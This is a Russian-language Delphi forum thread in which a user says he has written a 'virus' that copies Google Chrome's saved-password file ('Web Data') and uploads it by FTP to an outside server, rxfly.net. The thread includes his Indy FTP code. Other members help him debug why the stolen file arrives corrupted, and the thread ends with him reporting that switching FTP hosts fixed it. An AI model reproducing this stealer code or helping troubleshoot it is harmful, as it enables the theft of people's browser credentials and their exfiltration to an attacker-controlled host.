Четверг, 17.08.2017, 18:32 Приветствую вас Гость | Группа "Гости" 


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 1 из 11
Модератор форума: xXxSh@dowxXx, Anton93, Волк-1024 
delfcode » Delphi » Вопросы по Delphi » отправка паролей на ftp
отправка паролей на ftp
raviti2Дата: Воскресенье, 10.07.2011, 10:04 | Сообщение # 1
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
Я сделал вирус он берёт файл с паролями от браузера Google Chrome потом он отправляет этот файл на ftp файл приходит но я почему то его не могу открыть хотя этот же файл до отправки я открываю нормально. И когда отправляется файл переменовывается
 
gravitasДата: Воскресенье, 10.07.2011, 12:12 | Сообщение # 2
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Сравнивали размер\код до и после отправки? Как отправляете?

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
raviti2Дата: Воскресенье, 10.07.2011, 13:13 | Сообщение # 3
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
Code
googl2:= (local +'\Google\Chrome\User Data\Default\Web Data');

With IdFTP1 do
IdFTP1.Host:=('rxfly.net');
IdFTP1.Port:=21;
IdFTP1.Username:='';
IdFTP1.Password:='';
try
IdFTP1.Connect;
sleep(1000);
IdFTP1.ChangeDir('/');
//проверяем если файл есть,то заливает..
if FileExists (googl2) then IdFTP1.Put(googl2);

размер после отправки на ftp уже становится57 306байт а оригинал 57 344


Сообщение отредактировал raviti2 - Воскресенье, 10.07.2011, 13:13
 
gravitasДата: Воскресенье, 10.07.2011, 13:17 | Сообщение # 4
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Quote (raviti2)
 With IdFTP1 do 
   IdFTP1.Host...
  

Хм. Интересно, зачем тут стоит With?)
Код хекс редактором попробуйте сравнить. И еще. Какое имя файла получается после закачивания на фтп?


TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
raviti2Дата: Воскресенье, 10.07.2011, 13:28 | Сообщение # 5
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
после закачки на ftp имя Web Data. вот это убираем With?
 
gravitasДата: Воскресенье, 10.07.2011, 13:45 | Сообщение # 6
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
Полностью строку с With уберите. Дело конечно не в этом, но строка все же лишняя.

TheDeduction

Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
 
raviti2Дата: Воскресенье, 10.07.2011, 14:43 | Сообщение # 7
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
Спасибо. а как же сделать что бы можно было открыть
 
vvova15Дата: Воскресенье, 10.07.2011, 14:52 | Сообщение # 8
Участник
Зарегистрирован: 24.04.2010
Группа: Пользователи
Сообщений: 83
Статус: Offline
хром помоему ставит права на чтение файла или перехватывает обращения к нему: я как то в блокноте открыл этот файл и не сохраняя изменений закрыл. хром слетел после этого ссылаясь на некорректный файл который я открыл


ICQ 185-398
 
raviti2Дата: Воскресенье, 10.07.2011, 15:19 | Сообщение # 9
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
не я открываю через блокнот закрываю и серавно работает только если заливаю на ftp уже не работает
 
raviti2Дата: Воскресенье, 10.07.2011, 19:45 | Сообщение # 10
Был не раз
Зарегистрирован: 14.01.2011
Группа: Пользователи
Сообщений: 15
Статус: Offline
Проблема решена просто хостинг ftp поменял и всё проблема была в том что тот хостинг сам уже сжимал файлы да кстати вот это With IdFTP1 do я убрал и почему то файлы не заливались
 
dolphinДата: Понедельник, 11.07.2011, 14:25 | Сообщение # 11
Администратор
Сообщений: 902
Статус: Offline
Про With ... do прочитайте Доступно только для пользователей

Система: Windows 10 x64, Windows XP
Среды программирования: Delphi 7, Delphi 10 Seattle

Я не профессионал, я всего лишь любитель
Я не вредитель, я всего лишь теоретик
 
delfcode » Delphi » Вопросы по Delphi » отправка паролей на ftp
Страница 1 из 11
Поиск:

delfcode.ru © 2008 - 2017 Хостинг от uCoz